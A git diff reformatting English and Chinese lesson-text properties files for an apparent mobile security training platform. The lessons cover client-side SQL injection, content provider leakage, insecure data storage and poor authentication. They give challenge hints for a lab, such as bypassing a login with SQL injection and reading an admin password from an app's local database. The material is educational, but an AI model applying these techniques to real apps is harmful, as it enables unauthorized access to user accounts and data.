+paragraph.info.1 = <a>\u5BA2\u6237\u7AEF\u767B\u5F55\u6CE8\u5165</a>\u53D1\u751F\u5728\u5F53\u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8F93\u5165\u53EF\u6267\u884C\u7684,\u53EF\u6539\u53D8\u4E00\u4E2A App \u8FD0\u884C\u67E5\u8BE2\u7684<a>SQLite</a>\u547D\u4EE4. \u8BE5\u8BFE\u7684 APK \u4F7F\u7528 <a>AES</a> \u52A0\u5BC6\u5B83\u7684\u6570\u636E\u5E93. \u8981\u901A\u8FC7\u653B\u51FB\u52A0\u5BC6\u7CFB\u7EDF\u53BB\u7A83\u53D6\u767B\u5F55\u4FE1\u606F\u4F1A\u76F8\u5F53\u56F0\u96BE,\u5982\u82E5\u4F7F\u7528 SQL \u6CE8\u5165\u6765\u7ED5\u8FC7\u767B\u5F55\u5C06\u4F1A\u66F4\u52A0\u7B80\u5355.
+paragraph.info.2 = <a>\u8FC7\u6EE4\u7528\u6237\u8F93\u5165</a>\u88AB\u8BA4\u4E3A\u662F\u4E00\u79CD\u65E0\u6548\u7684\u9632\u5FA1\u5BA2\u6237\u7AEF\u6CE8\u5165\u65B9\u6CD5.\u7136\u540E\u66FF\u6362\u6389\u5173\u952E\u8BCD\u50CF SELECT, WHERE, FROM \u548C\u70B9\u6216\u7A7A\u683C. \u8FC7\u6EE4\u5C06\u53EA\u80FD\u4F7F\u653B\u51FB\u8005\u66F4\u96BE\u653B\u7834\u6CE8\u5165\u7F3A\u9677,\u4F46\u5374\u4E0D\u80FD\u963B\u6B62\u5165\u4FB5.
+paragraph.info.3 = \u4E00\u4E2A\u5B89\u5168\u7CFB\u7EDF\u53EA\u662F\u53D6\u51B3\u4E8E\u5176\u6700\u8584\u5F31\u7684\u73AF\u8282. \u6B63\u5982\u8C1A\u8BED\u4E00\u73AF\u8F6F\u5F31,\u5168\u94FE\u4E0D\u5F3A.\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u7528\u6237\u7684\u51ED\u8BC1. \u6211\u4EEC\u53EA\u9700\u8981\u77E5\u9053 APK \u4F7F\u7528\u8FD0\u884C\u4E00\u6761 SQL \u67E5\u8BE2\u8BED\u53E5\u4F5C\u4E3A\u7ECF\u5178\u7684\u4F8B\u5B50\u6765\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u540D\u548C\u5BC6\u7801\u662F\u5426\u5B58\u5728, \u901A\u8FC7\u5728\u4E00\u6761 SELECT \u7533\u660E\u4E2D\u9644\u52A0\u7528\u6237\u540D\u548C\u5BC6\u7801\u5230\u4E00\u4E2A String. \u5982\u679C\u8BE5\u7533\u660E\u8FD4\u56DE true,\u5219\u8BE5\u7528\u6237\u5DF2\u767B\u5F55. 
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5229\u7528 SQL \u6CE8\u5165\u5728\u8FD9\u4E2A\u6311\u6218\u7684\u5E94\u7528\u4E2D\u7ED5\u8FC7\u5BA2\u6237\u7AEF\u767B\u5F55.\u4E00\u65E6\u4F60\u4EE5\u4E00\u4E2A\u7BA1\u7406\u5458\u7684\u8EAB\u4EFD\u6210\u529F\u767B\u5F55,\u4F60\u4FBF\u53EF\u4EE5\u83B7\u53D6\u672C\u7AD9\u901A\u5173\u94A5\u5319.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties
index c37b1edae..db9113e87 100644
--- a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties
+++ b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties
@@ -1,7 +1,10 @@
-title.question.content_provider_leak=What is Content Provider Leakage?
-paragraph.info.1=A <a>Content Provider</a> is used by Android to provide access to a structured set of data within a central repository. Content Providers are intended to be accessed by other applications, however with the <a>Android Debug Bridge</a>, they can be accessed by anyone with access to a device.
-paragraph.info.2=In order to query a Content Provider without an App, perform the following adb commands
-paragraph.info.3=Without knowing the URI, an attacker can do a few things to figure it out. 
-challenge.description=The Key can be attained by querying the Content Provider. The URI is : <a>content://com.somewhere.hidden.SecretProvider/data</a>
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.content_provider_leak = What is Content Provider Leakage?
+
+paragraph.info.1 = A <a>Content Provider</a> is used by Android to provide access to a structured set of data within a central repository. Content Providers are intended to be accessed by other applications, however with the <a>Android Debug Bridge</a>, they can be accessed by anyone with access to a device.
+paragraph.info.2 = In order to query a Content Provider without an App, perform the following adb commands
+paragraph.info.3 = Without knowing the URI, an attacker can do a few things to figure it out. 
+
+challenge.description = The Key can be attained by querying the Content Provider. The URI is : <a>content://com.somewhere.hidden.SecretProvider/data</a>
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties
index f9e28b942..ce7e5a8e6 100644
--- a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties
+++ b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties
@@ -1,6 +1,9 @@
-title.question.content_provider_leak=\u4EC0\u4E48\u662F\u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F?
-paragraph.info.1=\u4E00\u4E2A<a>\u5185\u5BB9\u63D0\u4F9B\u5546</a>\u662F\u5B89\u5353\u7528\u4E8E\u63D0\u4F9B\u8FDB\u5165\u5230\u5728\u4E00\u4E2A\u4E2D\u592E\u5B58\u50A8\u5E93\u4E2D\u7684\u4E00\u4E2A\u7ED3\u6784\u5316\u6570\u636E\u96C6\u7684.\u5185\u5BB9\u63D0\u4F9B\u8005\u7684\u76EE\u7684\u662F\u7531\u5176\u4ED6\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE,\u7136\u800C,\u4F7F\u7528\u5B89\u5353\u8C03\u8BD5\u6865,\u4ED6\u4EEC\u53EF\u4EE5\u901A\u8FC7\u4EFB\u4F55\u4EBA\u8BBF\u95EE\u7684\u8BBE\u5907\u8FDB\u884C\u8BBF\u95EE.
-paragraph.info.2=\u8981\u5728\u4E0D\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u60C5\u51B5\u4E0B\u67E5\u8BE2\u4E00\u4E2A\u5185\u5BB9\u63D0\u4F9B\u8005,\u53EF\u6267\u884C\u4EE5\u4E0B adb \u547D\u4EE4
-challenge.description=\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u94A5\u5319\u53EF\u4EE5\u901A\u8FC7\u67E5\u8BE2\u5185\u5BB9\u4F9B\u5E94\u5546\u83B7\u53D6. URI \u662F : <a>content://com.somewhere.hidden.SecretProvider/data</a>
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
+title.question.content_provider_leak = \u4EC0\u4E48\u662F\u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F?
+
+paragraph.info.1 = \u4E00\u4E2A<a>\u5185\u5BB9\u63D0\u4F9B\u5546</a>\u662F\u5B89\u5353\u7528\u4E8E\u63D0\u4F9B\u8FDB\u5165\u5230\u5728\u4E00\u4E2A\u4E2D\u592E\u5B58\u50A8\u5E93\u4E2D\u7684\u4E00\u4E2A\u7ED3\u6784\u5316\u6570\u636E\u96C6\u7684.\u5185\u5BB9\u63D0\u4F9B\u8005\u7684\u76EE\u7684\u662F\u7531\u5176\u4ED6\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE,\u7136\u800C,\u4F7F\u7528\u5B89\u5353\u8C03\u8BD5\u6865,\u4ED6\u4EEC\u53EF\u4EE5\u901A\u8FC7\u4EFB\u4F55\u4EBA\u8BBF\u95EE\u7684\u8BBE\u5907\u8FDB\u884C\u8BBF\u95EE.
+paragraph.info.2 = \u8981\u5728\u4E0D\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u60C5\u51B5\u4E0B\u67E5\u8BE2\u4E00\u4E2A\u5185\u5BB9\u63D0\u4F9B\u8005,\u53EF\u6267\u884C\u4EE5\u4E0B adb \u547D\u4EE4
+
+challenge.description = \u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u94A5\u5319\u53EF\u4EE5\u901A\u8FC7\u67E5\u8BE2\u5185\u5BB9\u4F9B\u5E94\u5546\u83B7\u53D6. URI \u662F : <a>content://com.somewhere.hidden.SecretProvider/data</a>
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties
index ec45eb8f6..46d24fd1c 100644
--- a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties
+++ b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties
@@ -1,8 +1,11 @@
-title.question.m_insecure_data_storeage=What is Mobile Insecure Data Storage?
-paragraph.info.1=Insecure Data Storage occurs when an App stores sensitive data such as user credentials, API keys, Credit Card information insecurely. This issue occurs in numerous ways. Generally, for storing client side information, an App will use an <a>Sqlite database</a>.
-paragraph.info.2=This can be a favoured, cheaper method of storage instead of using a more expensive back end service. As a result, any user can access the data stored by the App. Insecure Data Storage becomes a danger when a user's App caches sensitive data, their phone is stolen or the attacker steals this information from local databases. Malware can also access this information easily. This risk is increased by the popularity of <a>rooting devices</a> which makes it much easier for an attacker to access this information.
-paragraph.info.3=There are other ways to store data insecurely. Using known broken hashing algorithms can lead to pain for the Apps users. Not only are they susceptible to <a>collisions</a>, where two different passwords can	potentially generate the same hash and be interpreted as the same password, the developer would have to assume that their user's use strong passwords. This is generally never the case and once a hashed value has been cracked, an attacker merely needs to update their tables.
-paragraph.info.4=This method still uses no key, Therefore one could assume it is not	truly encryption? Hashing algorithms are useful for comparing two different files but should not be used for storage of passwords (Unless done correctly).
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Typically an Android app will store it's database in the <a>/data/data/com.app.exampleApp/database/</a> directory. Anyone with a rooted device can access this directory. The Android App for this lesson stores it's under credentials in an <a>SQLite database</a>. The Admin's password is the result key to this lesson.
\ No newline at end of file
+title.question.m_insecure_data_storeage = What is Mobile Insecure Data Storage?
+
+paragraph.info.1 = Insecure Data Storage occurs when an App stores sensitive data such as user credentials, API keys, Credit Card information insecurely. This issue occurs in numerous ways. Generally, for storing client side information, an App will use an <a>Sqlite database</a>.
+paragraph.info.2 = This can be a favoured, cheaper method of storage instead of using a more expensive back end service. As a result, any user can access the data stored by the App. Insecure Data Storage becomes a danger when a user's App caches sensitive data, their phone is stolen or the attacker steals this information from local databases. Malware can also access this information easily. This risk is increased by the popularity of <a>rooting devices</a> which makes it much easier for an attacker to access this information.
+paragraph.info.3 = There are other ways to store data insecurely. Using known broken hashing algorithms can lead to pain for the Apps users. Not only are they susceptible to <a>collisions</a>, where two different passwords can	potentially generate the same hash and be interpreted as the same password, the developer would have to assume that their user's use strong passwords. This is generally never the case and once a hashed value has been cracked, an attacker merely needs to update their tables.
+paragraph.info.4 = This method still uses no key, Therefore one could assume it is not	truly encryption? Hashing algorithms are useful for comparing two different files but should not be used for storage of passwords (Unless done correctly).
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Typically an Android app will store it's database in the <a>/data/data/com.app.exampleApp/database/</a> directory. Anyone with a rooted device can access this directory. The Android App for this lesson stores it's under credentials in an <a>SQLite database</a>. The Admin's password is the result key to this lesson.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties
index 6293a819f..02d0d97be 100644
--- a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties
+++ b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties
@@ -1,8 +1,11 @@
-title.question.m_insecure_data_storeage=\u4EC0\u4E48\u662F\u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8?
-paragraph.info.1=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u5546\u5E97\u7684\u654F\u611F\u6570\u636E\u4E0D\u5B89\u5168,\u6BD4\u5982\u7528\u6237\u51ED\u8BC1,API\u5BC6\u94A5,\u4FE1\u7528\u5361\u4FE1\u606F\u7B49.\u8FD9\u4E9B\u95EE\u9898\u51FA\u73B0\u5728\u8BB8\u591A\u4E0D\u540C\u7684\u65B9\u9762.\u901A\u5E38\u60C5\u51B5\u4E0B,\u5BF9\u4E8E\u5BA2\u6237\u7AEF\u7684\u6570\u636E\u5B58\u50A8, \u5E94\u7528\u7A0B\u5E8F\u4F1A\u4F7F\u7528 <a>SQLite\u6570\u636E\u5E93</a>.
-paragraph.info.2=\u8FD9\u53EF\u4EE5\u662F\u4E00\u4E2A\u53D7\u9752\u7750\u7684,\u66F4\u4FBF\u5B9C\u7684\u5B58\u50A8\u65B9\u5F0F,\u800C\u4E0D\u662F\u4F7F\u7528\u4E00\u4E2A\u66F4\u6602\u8D35\u7684\u540E\u7AEF\u670D\u52A1.\u5176\u7ED3\u679C,\u4EFB\u4F55\u7528\u6237\u90FD\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE\u6240\u50A8\u5B58\u7684\u6570\u636E.\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D8\u5F97\u5371\u9669,\u662F\u5F53\u7528\u6237\u7684\u5E94\u7528\u7A0B\u5E8F\u7F13\u5B58\u654F\u611F\u6570\u636E,\u4ED6\u4EEC\u7684\u624B\u673A\u88AB\u5077\u6216\u8005\u653B\u51FB\u8005\u76D7\u53D6\u4E86\u4ED6\u4EEC\u7684\u4FE1\u606F\u4ECE\u672C\u5730\u6570\u636E\u5E93\u65F6.\u6076\u610F\u8F6F\u4EF6\u53EF\u4EE5\u8F7B\u6613\u5730\u8BBF\u95EE\u8FD9\u4E9B\u6570\u636E.\u8FD9\u79CD\u98CE\u9669\u7684\u589E\u52A0\u662F\u7531\u4E8E root \u8BBE\u5907\u7684\u666E\u53CA,\u8FD9\u4F7F\u5F97\u653B\u51FB\u8005\u66F4\u52A0\u5BB9\u6613\u8BBF\u95EE\u8FD9\u4E9B\u654F\u611F\u4FE1\u606F. 
-paragraph.info.3=\u8FD8\u6709\u5176\u4ED6\u4E0D\u5B89\u5168\u7684\u50A8\u5B58\u6570\u636E\u7684\u65B9\u6CD5.\u5982\u4F7F\u7528\u5DF2\u77E5\u7684\u5931\u6548\u7684\u6563\u5217\u7B97\u6CD5\u53EF\u7ED9\u5E94\u7528\u7A0B\u5E8F\u7684\u7528\u6237\u5E26\u6765\u707E\u96BE.\u4E0D\u4EC5\u4EC5\u662F\u4ED6\u4EEC\u5BB9\u6613\u5F15\u8D77\u78B0\u649E,\u5F53\u4E24\u4E2A\u4E0D\u540C\u7684\u5BC6\u7801\u53EF\u4EE5\u6F5C\u5728\u5730\u4EA7\u751F\u76F8\u540C\u7684\u54C8\u5E0C\u503C\u548C\u88AB\u89E3\u91CA\u4E3A\u76F8\u540C\u7684\u5BC6\u7801,\u5F00\u53D1\u4EBA\u5458\u5C06\u5FC5\u987B\u5047\u8BBE\u4ED6\u4EEC\u7684\u7528\u6237\u4F7F\u7528\u5F3A\u7684\u5BC6\u7801. \u8FD9\u901A\u5E38\u662F\u4ECE\u6765\u6CA1\u6709\u7684\u60C5\u51B5,\u4E00\u65E6\u4E00\u4E2A\u6563\u5217\u503C\u88AB\u7834\u89E3,\u653B\u51FB\u8005\u4EC5\u4EC5\u53EA\u9700\u8981\u66F4\u65B0\u81EA\u5DF1\u7684\u8868.
-paragraph.info.4=\u6B64\u65B9\u6CD5\u7684\u4F7F\u7528\u4ECD\u7136\u6CA1\u6709\u94A5\u5319,\u56E0\u6B64\u4EBA\u4EEC\u53EF\u4EE5\u5047\u8BBE\u5B83\u4E0D\u662F\u771F\u6B63\u7684\u52A0\u5BC6? \u6563\u5217\u7B97\u6CD5\u7528\u4E8E\u6BD4\u8F83\u4E24\u4E2A\u4E0D\u540C\u7684\u6587\u4EF6\u662F\u6709\u6548\u7684,\u4F46\u662F\u4E0D\u5E94\u8BE5\u88AB\u7528\u4E8E\u5BC6\u7801\u7684\u50A8\u5B58(\u9664\u975E\u662F\u88AB\u6B63\u786E\u5B8C\u6210\u7684).
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u901A\u5E38\u60C5\u51B5\u4E0B\u4E00\u4E2AAndroid\u5E94\u7528\u7A0B\u5E8F\u5C06\u5B83\u7684\u6570\u636E\u5E93\u4FDD\u5B58\u5728<A>/data/data/com.app.exampleApp/database/</A>\u76EE\u5F55\u4E0B. \u4EFB\u4F55\u4EBA\u53EA\u8981\u6709\u4E00\u4E2Arooted\u8BBE\u5907\u90FD\u53EF\u4EE5\u8BBF\u95EE\u8FD9\u4E2A\u76EE\u5F55.Android\u5E94\u7528\u7A0B\u5E8F\u5728\u8BE5\u8BFE\u4E2D,\u4F7F\u7528\u51ED\u8BC1\u5C06\u6570\u636E\u5B58\u50A8\u5728\u4E00\u4E2A<a> SQLite\u6570\u636E\u5E93</A>\u4E0B.\u7BA1\u7406\u5458\u7684\u5BC6\u7801\u4FBF\u662F\u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319.
+title.question.m_insecure_data_storeage = \u4EC0\u4E48\u662F\u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8?
+
+paragraph.info.1 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u5546\u5E97\u7684\u654F\u611F\u6570\u636E\u4E0D\u5B89\u5168,\u6BD4\u5982\u7528\u6237\u51ED\u8BC1,API\u5BC6\u94A5,\u4FE1\u7528\u5361\u4FE1\u606F\u7B49.\u8FD9\u4E9B\u95EE\u9898\u51FA\u73B0\u5728\u8BB8\u591A\u4E0D\u540C\u7684\u65B9\u9762.\u901A\u5E38\u60C5\u51B5\u4E0B,\u5BF9\u4E8E\u5BA2\u6237\u7AEF\u7684\u6570\u636E\u5B58\u50A8, \u5E94\u7528\u7A0B\u5E8F\u4F1A\u4F7F\u7528 <a>SQLite\u6570\u636E\u5E93</a>.
+paragraph.info.2 = \u8FD9\u53EF\u4EE5\u662F\u4E00\u4E2A\u53D7\u9752\u7750\u7684,\u66F4\u4FBF\u5B9C\u7684\u5B58\u50A8\u65B9\u5F0F,\u800C\u4E0D\u662F\u4F7F\u7528\u4E00\u4E2A\u66F4\u6602\u8D35\u7684\u540E\u7AEF\u670D\u52A1.\u5176\u7ED3\u679C,\u4EFB\u4F55\u7528\u6237\u90FD\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE\u6240\u50A8\u5B58\u7684\u6570\u636E.\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D8\u5F97\u5371\u9669,\u662F\u5F53\u7528\u6237\u7684\u5E94\u7528\u7A0B\u5E8F\u7F13\u5B58\u654F\u611F\u6570\u636E,\u4ED6\u4EEC\u7684\u624B\u673A\u88AB\u5077\u6216\u8005\u653B\u51FB\u8005\u76D7\u53D6\u4E86\u4ED6\u4EEC\u7684\u4FE1\u606F\u4ECE\u672C\u5730\u6570\u636E\u5E93\u65F6.\u6076\u610F\u8F6F\u4EF6\u53EF\u4EE5\u8F7B\u6613\u5730\u8BBF\u95EE\u8FD9\u4E9B\u6570\u636E.\u8FD9\u79CD\u98CE\u9669\u7684\u589E\u52A0\u662F\u7531\u4E8E root \u8BBE\u5907\u7684\u666E\u53CA,\u8FD9\u4F7F\u5F97\u653B\u51FB\u8005\u66F4\u52A0\u5BB9\u6613\u8BBF\u95EE\u8FD9\u4E9B\u654F\u611F\u4FE1\u606F. 
+paragraph.info.3 = \u8FD8\u6709\u5176\u4ED6\u4E0D\u5B89\u5168\u7684\u50A8\u5B58\u6570\u636E\u7684\u65B9\u6CD5.\u5982\u4F7F\u7528\u5DF2\u77E5\u7684\u5931\u6548\u7684\u6563\u5217\u7B97\u6CD5\u53EF\u7ED9\u5E94\u7528\u7A0B\u5E8F\u7684\u7528\u6237\u5E26\u6765\u707E\u96BE.\u4E0D\u4EC5\u4EC5\u662F\u4ED6\u4EEC\u5BB9\u6613\u5F15\u8D77\u78B0\u649E,\u5F53\u4E24\u4E2A\u4E0D\u540C\u7684\u5BC6\u7801\u53EF\u4EE5\u6F5C\u5728\u5730\u4EA7\u751F\u76F8\u540C\u7684\u54C8\u5E0C\u503C\u548C\u88AB\u89E3\u91CA\u4E3A\u76F8\u540C\u7684\u5BC6\u7801,\u5F00\u53D1\u4EBA\u5458\u5C06\u5FC5\u987B\u5047\u8BBE\u4ED6\u4EEC\u7684\u7528\u6237\u4F7F\u7528\u5F3A\u7684\u5BC6\u7801. \u8FD9\u901A\u5E38\u662F\u4ECE\u6765\u6CA1\u6709\u7684\u60C5\u51B5,\u4E00\u65E6\u4E00\u4E2A\u6563\u5217\u503C\u88AB\u7834\u89E3,\u653B\u51FB\u8005\u4EC5\u4EC5\u53EA\u9700\u8981\u66F4\u65B0\u81EA\u5DF1\u7684\u8868.
+paragraph.info.4 = \u6B64\u65B9\u6CD5\u7684\u4F7F\u7528\u4ECD\u7136\u6CA1\u6709\u94A5\u5319,\u56E0\u6B64\u4EBA\u4EEC\u53EF\u4EE5\u5047\u8BBE\u5B83\u4E0D\u662F\u771F\u6B63\u7684\u52A0\u5BC6? \u6563\u5217\u7B97\u6CD5\u7528\u4E8E\u6BD4\u8F83\u4E24\u4E2A\u4E0D\u540C\u7684\u6587\u4EF6\u662F\u6709\u6548\u7684,\u4F46\u662F\u4E0D\u5E94\u8BE5\u88AB\u7528\u4E8E\u5BC6\u7801\u7684\u50A8\u5B58(\u9664\u975E\u662F\u88AB\u6B63\u786E\u5B8C\u6210\u7684).
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u901A\u5E38\u60C5\u51B5\u4E0B\u4E00\u4E2AAndroid\u5E94\u7528\u7A0B\u5E8F\u5C06\u5B83\u7684\u6570\u636E\u5E93\u4FDD\u5B58\u5728<A>/data/data/com.app.exampleApp/database/</A>\u76EE\u5F55\u4E0B. \u4EFB\u4F55\u4EBA\u53EA\u8981\u6709\u4E00\u4E2Arooted\u8BBE\u5907\u90FD\u53EF\u4EE5\u8BBF\u95EE\u8FD9\u4E2A\u76EE\u5F55.Android\u5E94\u7528\u7A0B\u5E8F\u5728\u8BE5\u8BFE\u4E2D,\u4F7F\u7528\u51ED\u8BC1\u5C06\u6570\u636E\u5B58\u50A8\u5728\u4E00\u4E2A<a> SQLite\u6570\u636E\u5E93</A>\u4E0B.\u7BA1\u7406\u5458\u7684\u5BC6\u7801\u4FBF\u662F\u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319.
diff --git a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties
index ee64ca485..9d6f9985d 100644
--- a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties
+++ b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties
@@ -1,4 +1,6 @@
-title.question.m_poor_authentication=What is Poor Authentication?
-paragraph.info=Poor Authentication is an issue which occurs when an App relies on an authentication method which is insecure. This can come in many different forms. One such example is password reset functions, which although convenient, can compromise the authentication process. In this app, we don't need to know the password as a rest function is available to us. Secondly, the App is leaking logs of what the user has typed during previous uses of the App. This information will provide you with the data you need to reset the password and get the key. Authentication is validating that a user is who they say they are. Authorization is validating that a user has access to a given resource. (such as an Admin privilege.)
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.m_poor_authentication = What is Poor Authentication?
+
+paragraph.info = Poor Authentication is an issue which occurs when an App relies on an authentication method which is insecure. This can come in many different forms. One such example is password reset functions, which although convenient, can compromise the authentication process. In this app, we don't need to know the password as a rest function is available to us. Secondly, the App is leaking logs of what the user has typed during previous uses of the App. This information will provide you with the data you need to reset the password and get the key. Authentication is validating that a user is who they say they are. Authorization is validating that a user has access to a given resource. (such as an Admin privilege.)
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties
index fd5988a24..16f92c5d7 100644
--- a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties
+++ b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties
@@ -1,4 +1,6 @@
-title.question.m_poor_authentication=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1?
-paragraph.info=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u95EE\u9898\u662F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u4F9D\u8D56\u4E8E\u4E00\u4E2A\u4E0D\u5B89\u5168\u7684\u8BA4\u8BC1\u65B9\u5F0F.\u8FD9\u53EF\u4EE5\u6709\u8BB8\u591A\u4E0D\u540C\u7684\u5F62\u5F0F.\u5176\u4E2D\u4E00\u4E2A\u4F8B\u5B50\u5C31\u662F\u5BC6\u7801\u91CD\u7F6E\u529F\u80FD,\u867D\u7136\u65B9\u4FBF,\u5374\u53EF\u4EE5\u6CC4\u6F0F\u8BA4\u8BC1\u7684\u8FC7\u7A0B.\u5728\u8FD9\u4E2A\u7A0B\u5E8F\u4E2D,\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u5BC6\u7801\u4F5C\u4E3A\u91CD\u7F6E\u8FD9\u4E2A\u529F\u80FD\u4E8E\u6211\u4EEC\u662F\u53EF\u7528\u7684.\u5176\u6B21,\u8FD9\u4E2A\u7A0B\u5E8F\u6B63\u5728\u6CC4\u6F0F\u7528\u6237\u5728\u5148\u524D\u4F7F\u7528\u7A0B\u5E8F\u4E2D\u5DF2\u7ECF\u952E\u5165\u7684\u4FE1\u606F\u7684\u65E5\u5FD7.\u8FD9\u4E9B\u4FE1\u606F\u5C06\u63D0\u4F9B\u7ED9\u4F60\u6240\u9700\u8981\u91CD\u7F6E\u5BC6\u7801\u548C\u83B7\u5F97\u94A5\u5319\u7684\u6570\u636E.\u8EAB\u4EFD\u8BA4\u8BC1\u662F\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u8BF4\u4ED6\u662F\u8C01.\u6388\u6743\u662F\u9A8C\u8BC1\u7528\u6237\u5177\u6709\u8BBF\u95EE\u7ED9\u5B9A\u7684\u8D44\u6E90\u7684\u6743\u5229 (\u4F8B\u5982\u7BA1\u7406\u5458\u7279\u6743).
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
